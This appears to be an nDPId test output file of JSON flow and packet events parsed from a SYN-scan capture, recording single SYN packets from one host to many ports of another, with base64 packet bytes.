-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1649,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsgf0AACsGm3WsEAAIQA2GNIzSAwndUoMYAAAAAGACEAAlhgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1660,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1074,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1650,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsqw0AADUGaGWsEAAIQA2GNIzSBDLdUoMYAAAAAGACCAAsXQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1661,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsFlIAADYG\/CCsEAAIQA2GNIzSNZrdUoMYAAAAAGACDAD29AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1662,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1662,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1652,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsq0oAADgGZSisEAAIQA2GNIzSD1DdUoMYAAAAAGACBAAlPwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1663,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1663,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsxHMAACoGWf+sEAAIQA2GNIzSFxDdUoMYAAAAAGACDAAVfwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060906,"flow_last_seen":1278275060906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060906,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":787,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1654,"flow_packet_id":1,"flow_last_seen":1278275060906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060906,"pkt":"ACYLMQczACWzv5HuCABFAAAs2HMAACoGRf+sEAAIQA2GNIzSAxPdUoMYAAAAAGACDAApfAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1665,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060948,"flow_last_seen":1278275060948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060948,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1665,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1655,"flow_packet_id":1,"flow_last_seen":1278275060948,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060948,"pkt":"ACYLMQczACWzv5HuCABFAAAsW74AAC8GvbSsEAAIQA2GNIzTUVzdU4MZAAAAAGACEADXLwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1666,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1666,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1656,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsRtIAACoG16CsEAAIQA2GNIzTZmbdU4MZAAAAAGACDADGJQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1667,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1667,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1657,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAswvIAAC8GVoCsEAAIQA2GNIzTAHfdU4MZAAAAAGACEAAoFQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1668,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1668,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAslyQAADQGfU6sEAAIQA2GNIzTA2ndU4MZAAAAAGACBAAxIwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1669,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1669,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1659,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAs4nsAACsGOvesEAAIQA2GNIzTA4TdU4MZAAAAAGACEAAlCAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1670,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1660,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAswGgAACwGXAqsEAAIQA2GNIzTBATdU4MZAAAAAGACBAAwiAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1671,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3703,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1661,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsjQAAADUGhnKsEAAIQA2GNIzTDnfdU4MZAAAAAGACCAAiFQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1672,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1672,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1662,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsxBEAACgGXGGsEAAIQA2GNIzTAGTdU4MZAAAAAGACBAA0KAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1673,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAst8gAADsGVaqsEAAIQA2GNIzTA4fdU4MZAAAAAGACEAAlBQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1674,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1674,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1664,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsWzkAACgGxTmsEAAIQA2GNIzTA\/\/dU4MZAAAAAGACBAAwjQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1675,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1334,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1675,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1665,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAs6kQAADYGKC6sEAAIQA2GNIzTBTbdU4MZAAAAAGACDAAnVgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1676,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1676,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1666,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAszccAADoGQKusEAAIQA2GNIzTE77dU4MZAAAAAGACDAAYzgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1677,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1677,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1667,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsHwsAAC8G+mesEAAIQA2GNIzTAnzdU4MZAAAAAGACEAAmEAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1678,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1678,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1668,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAs0XAAACYGUQKsEAAIQA2GNIzTBFPdU4MZAAAAAGACDAAoOQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1679,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1679,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1669,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsKaQAACUG+c6sEAAIQA2GNIzSIL\/dUoMYAAAAAGACCAAP0AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1680,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1680,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1670,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsRwIAACoG13CsEAAIQA2GNIzSAiDdUoMYAAAAAGACDAAqbwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1681,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1681,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1671,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsl50AAC8GgdWsEAAIQA2GNIzSI5fdUoMYAAAAAGACEAAE+AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1682,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1682,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsPJwAACgG49asEAAIQA2GNIzSAbzdUoMYAAAAAGACBAAy0wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1683,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1683,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1673,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsm34AACcGhfSsEAAIQA2GNIzSDIvdUoMYAAAAAGACEAAcBAAAAgQFtA=="} 